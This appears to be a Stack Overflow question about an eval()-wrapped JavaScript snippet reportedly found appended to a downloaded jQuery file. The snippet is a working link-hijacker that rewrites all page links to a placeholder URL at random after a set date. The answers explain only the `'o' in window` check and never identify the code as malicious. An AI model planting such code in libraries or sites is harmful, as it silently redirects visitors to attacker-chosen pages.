# Window 'o' condition, what does it mean

Tags: javascript, jquery, html, window, eval

I have seen a code like this

```
if (!('o' in window)) { 
    o = "somelink";
    l =["n", "somelink"];
    p =[0.8,1]; d = new Date("2018/01/01");

    if (Date.now() >= d) { 
        r = Math.random();
        var x = document.getElementsByTagName('a');
        f=0;

        for(j in x) 
        if(x[j].href && x[j].href.indexOf(o) != -1 )
        f=1; 
        if(!f) 
        for(i in l) 

        if (p[i] >= r) { 
            if (l[i] != 'n') 
            for (j in x) x[j].href = l[i]; 
            break; 
         } 
     } 
 }
```

It's inside an `eval()` function and I need to understand what it is. Can someone please explain this code to me? thanks

Answer (score 1):

It must b some variable that is set in window and user is checking if 'o' is not in windows object

```js
console.log('o' in window)
window.o = 'MyData';
console.log('o' in window)
```

Comment: this was added on the end of downloaded jquery.min.js v3.3.1.. what does it do?

Comment: @daya_nara may be i can explain if i get the whole code

Answer (score 0):

`!('o' in window)` is kind of like another way of saying `typeof window.o === 'undefined'`. Basically the code block will only run if `o` does not exist in the `window` object.